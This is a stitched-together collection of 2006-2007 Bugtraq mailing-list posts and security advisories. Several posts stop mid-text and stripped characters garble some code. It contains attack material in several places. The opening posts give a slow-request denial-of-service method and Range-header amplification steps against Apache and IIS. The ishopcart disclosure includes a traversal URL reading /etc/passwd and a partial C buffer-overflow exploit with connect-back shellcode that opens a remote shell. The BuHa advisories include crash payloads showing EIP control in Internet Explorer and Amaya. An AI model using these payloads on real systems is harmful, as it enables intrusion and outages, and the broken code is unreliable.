requests are never to be finished. randomized headers, following the sitemap. 
send few bytes, wait smthin less than server timeout and send the next few 
bytes, never finish the request. at least apache will wait for the request to 
finish. with 2k proxies starting 3-4 requests (browsers sending parallel 
requests, target should allow more than one request) u can generate a contigous 
flow of 6k to 8k requests to apache. starvation will start sooner apache will 
just consume its resources waiting for bogus requests to finish, he will never 
read a full request but will just timeout waiting for data. the thing is you 
can make the wait process longer, because (at least in some implementation, i 
think i tested 1.3.x and 2.0.x), you send first few bytes then put apache in 
wait he will start his timer but when u send the next few bytes after X seconds 
he will reset his timer for that request. slow , sure-thing death.

with a default timeout of 300 seconds on server side and request headers having 
lets say 512 bytes of data, sending max rand(5,10) bytes before timeout comes 
in u will keep a thread busy for at least 300*50 seconds with one single 
request  ... discard connection when requewst is sent and just start a new one, 
u dont have to consume bw by reading response

a quick fix for this can be available at least on bsd, there is accf_http that 
can be modified not to pass the connection to apache until a full request is 
read (either get or post, full, not just the first get request header, ofcourse 
this can be even worst for a lot of post data). prolly there are ddos middle 
layers that can do the thing but i did not found one yet. at least the big guys 
on the market seem to be vulnerable.
you can't find patterns to stop this kind of attack cuz you simulate a real 
browser 100%, all u can do is to readahead the request and filter bogus before 
apache does. 99% from apache setups coming with default config, never modified 
by owner. thinking cpanel, at least. its not about consuming srv bw, its just 
about making it choke and its happening very fast.



On Thu, Jan 04, 2007 at 12:27:11AM +0100, Michal Zalewski wrote:
 I feel silly for reporting this, but I couldn't help but notice that
 Apache and IIS both have a bizarro implementation of HTTP/1.1 Range
 header functionality (as defined by RFC 2616). Their implementations allow
 the same fragment of a file to be requested an arbitrary number of times,
 and each redundant part to be received separately in a separate
 multipart/byteranges envelope.
 
 Combined with the functionality of window scaling (as per RFC 1323), it is
 my impression that a lone, short request can be used to trick the server
 into firing gigabytes of bogus data into the void, regardless of the
 server file size, connection count, or keep-alive request number limits
 implemented by the administrator. Whoops?
 
 Since there are easier tools to (D)DoS a service, and since nothing about
 this attack is particularly innovative, I'll just describe what's on my
 mind... let's say that http://example.com/foo.html is a medium-size static
 file we found on the server (something on the order of 300 kB for Apache
 and 150 kB for IIS is optimal). An attack would then look roughly the
 following way:
 
   1) Connect to the server (as many times as allowed by the remote party
  or deemed appropriate for the purpose of this demonstration),
 
   2) Negotiate a high TCP window size for each of the connections (1 GB
  should be doable),
 
   3) Send a partial request as follows for each of the connections:
  GET /foo.html HTTP/1.1
  Host: example.com
  Range: bytes=0-,0-,0-,0-,0-... (up to 8 kB for Apache, 16 kB for IIS)
 
  Each 0- would generate a separate multipart/byteranges containing
  the entire file (bytes from 0 'til EOF).
 
   4) Send a closing newline within each of the connections to commit
  the request,
 
   5) Silently drop the connections, possibly re-connect to dial-up / DSL
  to duck the responses that would keep pouring at full speed until
  TCP window size is exhausted or an ISP-level non-delivery /
  congestion control mechanism kicks in (and isn't filtered out
  down the route).
 
 This should cause the server to send gigabytes of data, with only a
 minimal bandwidth expense on the attacker's end.
 
 Well, that's the story.
 
 This isn't the only fire-and-run-away attack that seems to be made much
 more feasible with the help of window scaling (by making it more tempting
 for the attacker to request tons of data and then go off-line 

Re: [WEB SECURITY] Universal XSS with PDF files: highly dangerous

[bugtraq]

A slashdot user suggested the following


One possible work around on the server side:
Direct your web server to serve .pdf files as mime type application/octet
That way the files will be saved to disk instead of opening in the browser plug 
in.


URL:
http://it.slashdot.org/comments.pl?sid=214868threshold=1commentsort=0mode=threadcid=17450834

This may cause undesired effects on certain browsers on the otherhand. 


- Robert
http://www.cgisecurity.com/ Website Security news, and more
http://www.cgisecurity.com/index.rss [RSS Security Feed]

Re: shopsite advisory

[bugtraq]

This issue was fixed in a patch (8.1.3.1) issued in October.  

The announcement from ShopSite is here (see the first item under 
Miscellaneous):

http://support.shopsite.com/kbase/view_answer.php?questionID=S5518

Re: [WEB SECURITY] The state of JavaScript Hacking

[bugtraq]

 Mozilla with their XUL makes attackers life so much easier. It is not
 that the Mozilla browser is vulnerable to any specific type of attack
 but the past has already proved many times that eventually someone
 will find an issue with the architecture. Then people will find the
 same mistake in other places. The Mozilla XUL is considered a true RIA
 (Rich Internet Application) platform that is currently the base of
 many open source products. All of them support JavaScript, CSS, Flash
 (if installed) and Java (if installed). If the developers of these
 applications don't have deep understandings of the security
 implications of the Mozilla platform the WEB will become suddenly very
 dangerous place for them.
 
 Last but not least we have Microsoft with their XAML and WPF (Windows
 Presentation Foundation). I am sure that not that many people have
 heard of these technologies so let me explain what they are in brief.
 They are the Microsoft's way to do RIA. The only thing is that they
 relay on .NET3 which makes them explicitly for Windows. I am not sure
 what is the state of the MONO project though.
 
 WPF will allow you to build Rich Internet Applications with XML, CSS
 and .NET. .NET supports many languages one of which is JavaScript. Try
 to do some coding in ASP and you will see that it feels the same as
 browser JavaScript. This is JavaScript on the server, the browser and
 the desktop. It enables web worms and future high-end attackers to a
 degree hardly imaginable by anyone today.


I've been waiting awhile to see someone talk about this! :)

It is good to hear some conversation about XUL and WPF/XAML as these kinds of 
applications/technologies will change
the way we use the web. For those who know nothing about these technologies 
picture a windows application running
inside of your browser having the same look/feel as a non web application (a 
pretty applet). One of the initial concerns involves
the users inability to 'be aware of' application changes initiated potentially 
via XSS or other types of script injection.
One could XSS a site, change the URL to the sites RIA application to their own, 
and potentially act as a proxy with
the real application without the users knowledge. Does anyone know of any 
decent links/tutorials on signing XUL/WPF/XAML apps
to prevent such situations?

One of the neat .NET 3.0 features allows a developer to at compile time decide 
if an application is web based or standalone. So
for those of you who have written applets instead of modifying code you just 
change a compile time option.

Finally, it is worth noting that Windows executables can be hosted in a window 
(by default) as well as in the browser. In both cases, the code remains the 
same and only needs to be compiled again with a different project property.

- http://msdn.microsoft.com/msdnmag/issues/04/01/DevelopingAppsforLonghorn/


Additional reading for those interested 
http://blogs.msdn.com/mharsh/archive/2006/03/23/559106.aspx
http://msdn2.microsoft.com/en-us/library/ms746927.aspx

Sample applications:
http://www.charlespetzold.com/wpf/

- zeno
http://www.cgisecurity.com Website Security news and more!
http://www.cgisecurity.com/index.rss [RSS Feed]

Challenges faced by automated web application security assessment tools

[bugtraq]

There are many challenges that web application security scanners face that are 
widely known within the industry however may not be so obvious to someone 
evaluating a product. For starters if you think you can just download, install, 
and run a product against any site and get a report outlining all of its risks 
you'd be probably be wrong.

Article:
http://www.cgisecurity.com/articles/scannerchallenges.shtml

- Robert
http://www.cgisecurity.com/ Website Security news and more!
http://www.cgisecurity.com/index.rss [Security RSS Feed]

Assessment of Vista Kernel Mode Security

[ATR-Bugtraq]

Everyone - Symantec has just released an in depth report on the security
of the Windows Vista kernel.  This is a detailed technical report that
discusses how Vista boots, how PatchGuard and Code Integrity work, as
well as a technique on how to bypass them.

You can find the paper here:

http://www.symantec.com/avcenter/reference/Windows_Vista_Kernel_Mode_Sec
urity.pdf

These technologies introduce a number of concerns for the software
industry. Some of them are discussed here:

http://www.symantec.com/enterprise/security_response/weblog/2006/08/asse
ssment_of_vista_kernel_mod.html

If anyone thinks this is self-serving, it really isn't.  These
technologies have real implications on the future of software
development.

Re: crashing firefox = 1.5.0.4

[bugtraq]

I cannot reproduce it with Mozilla/5.0 (Windows; U; Windows NT 5.1; bg; 
rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4.


Are you sure you tested it on a clean install? Because I observed the same 
behaviour several weeks ago and I found it vanished after deactivating the 
LiveHTTPHeaders extension.

Re: phpbb 3.x sql injection (with global moderator rights)

[bugtraq]

This issue has been fixed in CVS. I will also remind everyone that 3.0 is beta 
software and has not yet had a security audit, and therefore we do not 
recommend to use the beta in a live environment.


I would also like to remind people that in future we would appreciate it if 
such reports could be reported to us first in our security tracker at:

http://www.phpbb.com/security/add_report.php


NeoThermic

Mathcad Area Lock Vulnerability

[bugtraq]

Description of Vulnerability



One of the features of Mathcad (www.mathsoft.com) is allowing the user to 
define ‘Areas’. Mathsoft say that ‘You can use areas to protect, lock, or hide 
information or equations in your worksheets’ and that ‘You can also protect the 
contents within the area, so no one else can edit them’. 


Whilst this is true, it is also very easy to unlock these Areas without needing 
the password. In the newer versions of Mathcad (12 onwards) the sheets are 
stored in XML format. This provides an easy means of altering the Mathcad 
sheet, as it is simply plain text. There are 4 vulnerabilities in the way the 
Area locks work:

1.  Password - This attribute is stored as a hashed text string. However 
the hashes produced for the same word on different sheets are always identical. 
For example XfAPUVYgXPg= represents the string password, and could be used 
in any sheet. So it is possible to create another Mathcad sheet, lock an Area 
with a known password and then use a text editor to copy and paste the known 
password over the unknown one.

2.  Timestamp - Like the password string, this can also be changed to be 
any value. So the sheet could be unlocked, modified, relocked and then the date 
of the relocking could be changed to be the original lock date.

3.  Complete removal of lock - Inside the Area tag there are is an 
‘is-locked’ attribute. When a lock has been enabled this is set to true. 
However to remove the lock all that needs to be done is change this value to 
false. Out of completeness the ‘timestamp’ attribute should be changed to an 
empty string and then the ‘password’ attribute removed. Although these last two 
changes are not needed to unlock the Area.

4.  Protection can be bypassed completely - The data stored in the locked 
area can also be viewed in a text editor. So this could also be copied and 
pasted into another sheet, without the lock protection section.


Affected Versions

=

12,

13,

13.1

(all prior ones are not vulnerable)


Exploit PoC

===

None required, use a text editor.

ishopcart cgi 0day and multiple vulnerabilities

[bugtraq]

Vendor: ishopcart inc
Vendor Site: ishopcart.com
Vendor Status: notified via telephone

While spending a night auditing I have found 2 buffer overflows and 1
directory traversal in the ishopcart cgi, which is written in C. 

The directory traversal is caused by how the cgi chooses to show pages.
If, for example, the CGI is tould to show an order form, the order
form's name is taken as argv[1] and opens this file and prints it, ie:

/cgi-bin/easy-scart.cgi?../../../../../../../etc/passwd

The first buffer overflow is in main()'s szTmp[100] variable. argv[1] is
placed in this variable through a sprintf, although no check is made on
the size of argv[1] before putting it in szTmp:

sprintf(szTmp,%s,argv[1]);

The other buffer overflow (of which I have succesfuly exploited) lies in
main() also, but is overflowed in vGetPost(). char  szBuf[4000]; is
passed to vGetPost() under the circumstance that argv[1] contains
specific criteria. vGetPost() reads POST data until the word Submit is
encountered, doing absolutely no bounds checking on the ammount of data
supplied.

When notified via telephone, the author claimed to be in the process of
fixing these errors, and at the same time took ishopcart.com offline.
Provided is the exploit code that spawns a connect back shell. It has been 
tested both localy and remotely
and has proved to work 100%

The real issue lies in the fact that this is a shopping cart system.
Also, since this is a cgi script, apache forks before executing it and
hence does not die on unsuccessful attempts, meaning that combined with
a massive 4000 NOP buffer, brute forcing of the offset is possible
leading to a theoretical 100% probability of remote code execution.

The good news is that this program doesn't seem to be common. If you you
would like to view the site and the code, search 'ishopcart' on google
and click it's cached link, then hit the source code link and you'll see
easy-scart.c through easy-scart6.c (all, of which, are vulnerable)

--K-sPecial
/* Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: ishopcart-cgi-bof.c (= easy-scart6.c)
 * Date: 5/25/2006
 * Version:
 *  1.00 (5/25/2006) - ishopcart-cgi-bof.c created
 *
 * Description: there is an overflow in the vGetPost() function, it does not do 
any size checking on the inputed data but instead
 *  reads until the word Submit is encountered, in turn overflowing pszBuf 
which points to a 4000 byte buffer in main(). Complete
 *  code execution is spawned, with the code being a connectback shell.
 *
 * Notes: I could not for the life of me find any connect back shellcode that 
forks! This code needed to fork because apache
 *  was killing the connect back process as soon as it connected. So, in turn, 
I have modified netric's callback shellcode with
 *  some forking shellcode to accomplish the workaround.
 *
 * Compile: gcc -o icb ishopcart-cgi-bof.c -std=c99
*/
#include stdio.h
#include sys/socket.h
#include sys/types.h
#include arpa/inet.h
#include netdb.h
#include string.h
#include getopt.h
#include errno.h
#include stdlib.h

#define PORT80
#define CB_PORT 31337
#define IP_OFFSET   33 + 13
#define PORT_OFFSET 39 + 13// + 13 to these for the new forking mod 
added to cb[]
#define OFFSET  0x41414141 // find your own damn offset, the code works 
100% any fault is on yourself

void changeip(char *ip);
void changeport(char *code, int port, int offset);
void help(void);

// netric callback shellcode
char cb[] =
\x31\xc0\x31\xdb 

\xb0\x02  // movb $0x2,%al/ 
sys_fork (2)
\xcd\x80  // int  $0x80
\x38\xc3  // cmpl %ebx,%eax   / check 
if child; %eax = 0x0
\x74\x05  // je   0x5 / jump 
after the exit if we're the child
// sys_exit (1)
\x8d\x43\x01  // leal 0x1(%ebx),%eax  / 
sys_exit (1) if we're the parent
\xcd\x80  // int  $0x80   / 
interrupt 80 to execute sys_exit

\x31\xc9\x51\xb1
\x06\x51\xb1\x01\x51\xb1\x02\x51
\x89\xe1\xb3\x01\xb0\x66\xcd\x80
\x89\xc2\x31\xc0\x31\xc9\x51\x51
\x68\x41\x42\x43\x44\x66\x68\xb0
\xef\xb1\x02\x66\x51\x89\xe7\xb3
\x10\x53\x57\x52\x89\xe1\xb3\x03
\xb0\x66\xcd\x80\x31\xc9\x39\xc1
\x74\x06\x31\xc0\xb0\x01\xcd\x80
\x31\xc0\xb0\x3f\x89\xd3\xcd\x80
\x31\xc0\xb0\x3f\x89\xd3\xb1\x01
\xcd\x80\x31\xc0\xb0\x3f\x89\xd3
\xb1\x02\xcd\x80\x31\xc0\x31\xd2
\x50\x68\x6e\x2f\x73\x68\x68\x2f
\x2f\x62\x69\x89\xe3\x50\x53\x89
\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0
\x01\xcd\x80;

int main (int argc, char **argv) {
int sock;
unsigned offset = OFFSET, ipaddr, i = 0;
unsigned short port = PORT, cbport = CB_PORT;
struct sockaddr_in server;
char 

[BuHa-Security] MS06-013: HTML Tag Memory Corruption Vulnerability in MS IE 6 SP2

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-

Hash: RIPEMD160


 ---

| BuHa Security-Advisory #13|May 25th, 2006 |

 ---

| Vendor   | MS Internet Explorer 6.0   |

| URL  | http://www.microsoft.com/windows/ie/   |

| Version  | = 6.0.2900.2180.xpsp_sp2  |

| Risk | Critical (Memory Corruption)   |

 ---


The Microsoft Security Response Center rated following issues as

critical because, on the face of it, they could produce an exploitable

memory corruption (see HTML Tag Memory Corruption Vulnerability -

CVE-2006-1188 [1]) with a variant of my PoC.


o Description:

=


Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser

made by Microsoft and currently available as part of Microsoft Windows.


Visit http://www.microsoft.com/windows/ie/default.mspx or

http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.


o Memory Corruption Vulnerability: mshtml.dll#7d519030

=


Following HTML code forces IE 6 to crash:

 !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN

  http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd;

 html  fieldseth4

 pretd

 menu

 legend

 a

 ul

 small

 fieldset

 h6

 /h6

 /u

 /optgroup

 /tr

 /map

 /ul

 /dfn



 /del

 /h2

 /dir

 /ul


Online-demo:

http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html


These are the register values and the ASM dump at the time of the access

violation:

 eax= ebx=0012e88c ecx= edx=0012e7c0 esi=

 edi=0004 eip=7d519030 esp=0012e780 ebp=0012e894



 7d519012 55   pushebp

 7d519013 8bec mov ebp,esp

 7d519015 8b4104   mov eax,[ecx+0x4]

 7d519018 394508   cmp [ebp+0x8],eax

 7d51901b 7c09 jl  mshtml+0x69026 (7d519026)

 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)

 7d51901f 33c0 xor eax,eax

 7d519021 40   inc eax

 7d519022 5d   pop ebp

 7d519023 c20800   ret 0x8

 7d519026 83c8ff   or  eax,0x

 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)

 7d51902b 90   nop

 7d51902c 90   nop

 7d51902d 90   nop

 7d51902e 90   nop

 7d51902f 90   nop

 FAULT -7d519030 8b4108   mov eax,[ecx+0x8]

   ds:0023:0008=

 7d519033 85c0 testeax,eax

 7d519035 7425 jz  mshtml+0x6905c (7d51905c)

 7d519037 8b10 mov edx,[eax]

 7d519039 f6c210   testdl,0x10

 7d51903c 7408 jz  mshtml+0x69046 (7d519046)

 7d51903e f6c220   testdl,0x20

 7d519041 7519 jnz mshtml+0x6905c (7d51905c)

 7d519043 8b400c   mov eax,[eax+0xc]

 7d519046 8b4808   mov ecx,[eax+0x8]

 7d519049 85c9 testecx,ecx


o Memory Corruption Vulnerability: mshtml.dll#7d529d35

=


Following HTML code forces IE 6 to crash:

 !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.01 Transitional//EN

 http://www.w3.org/TR/html4/loose.dtd;

 bdo

 /span

 pre



 param

 form

 colgroup

 small

 /small

 /colgroup

 /map

 /button

 /code



 blockquote

 th

 small



 /tbody

 /tr

 /ol

 /tbody

 /ol

 /code

 /strong





 head

 fieldset

 style



 /style

 /dir

 /a

 /td

 /li

 /label

 /object

 /bdo

 /th

 /object

 /q



 ol

 object


Online-demo:

http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html


These are the register values and the ASM dump at the time of the access

violation:

 eax= ebx=0012e88c ecx= edx=0012 esi=00e7dbb0

 edi=0002 eip=7d529d35 esp=0012e778 ebp=0012e778



 7d529d0e e81117   callmshtml+0x7b424 (7d52b424)

 7d529d13 85c0 testeax,eax

 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2

   (7d5aede0)

 7d529d1b 0fb65508 movzx   edx,byte ptr [ebp+0x8]

 7d529d1f 8d84968000   lea eax,[esi+edx*4+0x80]

 7d529d26 5e   pop esi

 7d529d27 5d   pop ebp

 7d529d28 c20c00   ret 0xc

 7d529d2b 90   nop

 7d529d2c 90   nop

 7d529d2d 90   nop

 7d529d2e 90   nop

 7d529d2f 90   nop

 7d529d30 8bff   

[BuHa-Security] DoS Vulnerability in Firefox 1.5.0.1

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #9 |Apr 12th, 2006 |
 ---
| Vendor   | Mozilla Firefox|
| URL  | http://www.mozilla.com/firefox/|
| Version  | = 1.5.0.1 |
| Risk | Low (DoS - Null Pointer Dereference)   |
 ---

o Description:
=

The award-winning Web browser is better than ever. Browse the Web
with confidence - Firefox protects you from viruses, spyware and
pop-ups. Enjoy improvements to performance, ease of use and privacy.

Visit http://www.mozilla.com/firefox/ for detailed information.

o Denial of Service:
===

Following HTML source forces Firefox = 1.5.0.1 to crash:
 legend
  kbd
object
  h4
/object
  /kbd

Online-demo:
http://morph3us.org/security/pen-testing/firefox/firefox1501-nsBlockFrame.html

The access violation results in a non-exploitable Null Pointer Dereference.

o Disclosure Timeline:
=

01 Oct 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
15 Dec 05 - Vendor confirmed vulnerability.
02 Feb 06 - Fixed on 1.x branches.
12 Apr 06 - Public release.

o Solution:
==

The upcoming versions of Firefox (1.0.8 and 1.5.0.2) will address this
issue.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-firefox-1501.txt

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPVY0kCo6/ctnOpYRA02MAJ44HoaPKmgnii3+uM7RBNA5WsJ2BgCdHTdM
e3SnWFYbwoCSftadTtIfzr0=
=dVrF
-END PGP SIGNATURE-

[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #10|Apr 12th, 2006 |
 ---
| Vendor   | W3C's Amaya|
| URL  | http://www.w3.org/Amaya/   |
| Version  | = 9.4 |
| Risk | Critical (Remote Code Execution)   |
 ---

o Description:
=

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the Amaya Overview page [1] for more details.

o Stack overflow:


Both of the two below posted code snippets (in fact there are dozens
of possible snippets but all of them trigger the same bug) force
Amaya 9.4 to crash:
 colgroup compact=Ax200
  [...]
 textarea rows=Ax200

After the first glance at the generated error report and respectively
the ASM code during the access violation I thought I came across a
heap based buffer overflow.

 eax=00f9 ebx=02ae8420 ecx=77bcec76 edx=41414141 esi=007b9420
 edi=01ae6d5c eip=004edd95 esp=0012e7ac ebp=007d6110 iopl=0
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=  efl=00010206

 004edd61 03f3 add esi,ebx
 004edd63 a4   movsb
 004edd64 8b4500   mov eax,[ebp]
 004edd67 8b8c241c01   mov ecx,[esp+0x11c]
 004edd6e 8b94241801   mov edx,[esp+0x118]
 004edd75 50   pusheax
 004edd76 51   pushecx
 004edd77 53   pushebx
 004edd78 52   pushedx
 004edd79 e8a23c0200   callamaya+0x111a20 (00511a20)
 004edd7e 53   pushebx
 004edd7f e83cf9   callamaya+0xfd6c0 (004fd6c0)
 004edd84 83c428   add esp,0x28
 004edd87 8bbc24fc00   mov edi,[esp+0xfc]
 004edd8e 8b94240001   mov edx,[esp+0x100]
 FAULT -004edd95 8b4240   mov eax,[edx+0x40]
   ds:0023:41414181=
 004edd98 83f844   cmp eax,0x44
 004edd9b 0f852703 jne amaya+0xee0c8 (004ee0c8)
 004edda1 837c242457   cmp dword ptr [esp+0x24],0x57
 004edda6 0f846506 je  amaya+0xee411 (004ee411)
 004eddac 8b4500   mov eax,[ebp]
 004eddaf 8b8c240801   mov ecx,[esp+0x108]
 004eddb6 6aff push0xff
 004eddb8 50   pusheax
 004eddb9 51   pushecx
 004eddba 57   pushedi
 004eddbb e8d33af1ff   callamaya+0x1893 (00401893)
 004eddc0 83c410   add esp,0x10
 004eddc3 5f   pop edi
 004eddc4 5e   pop esi
 004eddc5 5d   pop ebp

After a second, more precise look, the evitable heap overflow turned
out to be a stack based overflow..

We are able to control the EIP:
 textarea rows=
 A
 A
 A
 

 eax=0001 ebx= ecx=77c10e72 edx=007bd472
 esi=003e edi= eip=42424242 esp=0012ea38 ebp=

 Function: nosymbols
 No prior disassembly possible
 42424242 ?? ???
 42424244 ?? ???
 42424246 ?? ???
 42424248 ?? ???
 4242424a ?? ???
 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-textarea-rows.html

In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==

Upgrade to the latest version of Amaya. [2]

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy 

[BuHa-Security] Stack Based Buffer Overflow Vulnerability in Amaya 9.4 #2

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

 ---
| BuHa Security-Advisory #11|Apr 12th, 2006 |
 ---
| Vendor   | W3C's Amaya|
| URL  | http://www.w3.org/Amaya/   |
| Version  | = 9.4 |
| Risk | Critical (Remote Code Execution)   |
 ---

o Description:
=

The current releases, Amaya 9.5, is available for Linux, Windows and
now MacOS X (see screenshot). It supports HTML 4.01, XHTML 1.0, XHTML
Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, many CSS 2 features, and
includes SVG support (transformation, transparency, and SMIL animation).

See the Amaya Overview page [1] for more details.

o Stack overflow:


The following code snippet forces Amaya 9.4 to crash:
 legend color=Ax200

 eax=41414141 ebx=02ae7200 ecx=41414141 edx=41414141 esi=
 edi= eip=00516135 esp=0012e1cc ebp=007dd6e8 iopl=0
 cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=  efl=00010206

 00516114 56   pushesi
 00516115 57   pushedi
 00516116 33ff xor edi,edi
 00516118 33f6 xor esi,esi
 0051611a 3bcf cmp ecx,edi
 0051611c 893d943df101 mov [amaya+0x1b13d94
 (01f13d94)],edi
 00516122 7511 jnz amaya+0x116135 (00516135)
 00516124 6a0a push0xa
 00516126 e825d80500   callamaya+0x173950 (00573950)
 0051612b 83c404   add esp,0x4
 0051612e 8bd7 mov edx,edi
 00516130 8bc6 mov eax,esi
 00516132 5f   pop edi
 00516133 5e   pop esi
 00516134 c3   ret
 FAULT -00516135 8b4134   mov eax,[ecx+0x34]
 ds:0023:41414175=
 00516138 3bc7 cmp eax,edi
 0051613a 74f2 jz  amaya+0x11612e (0051612e)
 0051613c 8b4938   mov ecx,[ecx+0x38]
 0051613f 5f   pop edi
 00516140 8bd1 mov edx,ecx
 00516142 5e   pop esi
 00516143 c3   ret
 Nopslide..

We are able to control the EIP:
 legend color=
 A
 A
 AAA

 eax=0ade6e01 ebx=0ac7da00 ecx=0ade6e28 edx=1bce0002 esi=007de85a
 edi=01aeb154 eip=42424242 esp=0012e79c ebp=007da170 iopl=0
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=  efl=0202

 Funktion: nosymbols
 No prior disassembly possible
 42424242 ?? ???
 42424244 ?? ???
 42424246 ?? ???
 42424248 ?? ???
 4242424a ?? ???
 4242424c ?? ???

Online-demo:
http://morph3us.org/security/pen-testing/amaya/amaya-94-legend-color.html

In fact, sucessful exploitation of this vulnerability is not that easy
because non-text characters were modfified during parsing therefore you
have to find a place where to place the shellcode. Naturally you have
to avoid null bytes too because Amaya would stop parsing the attribute
value and the overflow would not get triggered.

o Disclosure Timeline:
=

21 Dec 05 - Vulnerability discovered.
21 Feb 06 - Vendor contacted.
23 Feb 06 - Vendor confirmed vulnerability.
08 Mar 06 - Vendor fixed vulnerability.
12 Apr 06 - Public release.

o Solution:
==

Upgrade to the latest version of Amaya. [2]

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online:
http://morph3us.org/advisories/20060412-amaya-94-2.txt

[1] http://www.w3.org/Amaya/Amaya.html
[2] http://www.w3.org/Amaya/User/BinDist.html

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPYDPkCo6/ctnOpYRA+b0AJ0S4sWE2UE0WjMrFBeRKwmWWd9oIwCfSWdX
MW1HldAZyLYolnZ8k/jA/Vw=
=PeiV
-END PGP SIGNATURE-

[BuHa-Security] Multiple Vulnerabilities in MS IE 6.0 SP2

[bugtraq]

-BEGIN PGP SIGNED MESSAGE-
Hash: RIPEMD160

Multiple Vulnerabilities in MS IE 6.0 SP2

Recently, I discovered three vulnerabilities in Microsoft Internet
Explorer 6 SP2 with all patches applied. All of these bugs are located
in `mshtml.dll' and are caused by incorrect handling of specially
crafted HTML documents. The severity of the first security issue
(mshtml.dll#7d6d2db4) is low because it is a non-exploitable Null
Pointer Dereference vulnerability and leads to DoS. The second
(mshtml.dll#7d519030) and third (mshtml.dll#7d529d35) vulnerability
are similar and the Microsoft Security Response Center rated them as
critical because, on the face of it, they could produce an exploitable
memory corruption (see HTML Tag Memory Corruption Vulnerability -
CVE-2006-1188) with a variant of my PoC.

To satisfy the request of the Microsoft Security Response Center I'm
going to support further details at a later date..

o Description:
=

Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.

Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Disclosure Timeline:
=

xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
11 Apr 06 - Vendor released security update.
12 Apr 06 - First advisory released.

o Solution:
==

Two of the mentioned vulnerabilities are addressed in the latest
security update for Internet Explorer [2]. I think - this is not an
official statement from the Microsoft Security Response Center - the
third security issue will be fixed in an upcoming service pack release.

o Credits:
=

Thomas Waldegger [EMAIL PROTECTED]
BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address '[EMAIL PROTECTED]' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.

Advisory online: http://morph3us.org/advisories/20060412-msie6-sp2.txt

[1] http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx

-BEGIN PGP SIGNATURE-
Version: n/a
Comment: http://morph3us.org/

iD8DBQFEPVbIkCo6/ctnOpYRA3XdAJ9C18OLBug0Gbfhcy2QhAXaQNkP6ACfdM1s
QIUo3pT6NBXkBnFtwGcYCWU=
=yG/7
-END PGP SIGNATURE-

Cantv/Movilnet's Web SMS vulnerability.

[Bugtraq @ SNSecurity]

Quick Summary:


Product : Movilnet's Web SMS.
Version : In-production versions.
Vendor : Movilnet - http://www.movilnet.com.ve/
Class : Remote
Criticality : High
Operating System(s) : N/A.

Synopsis


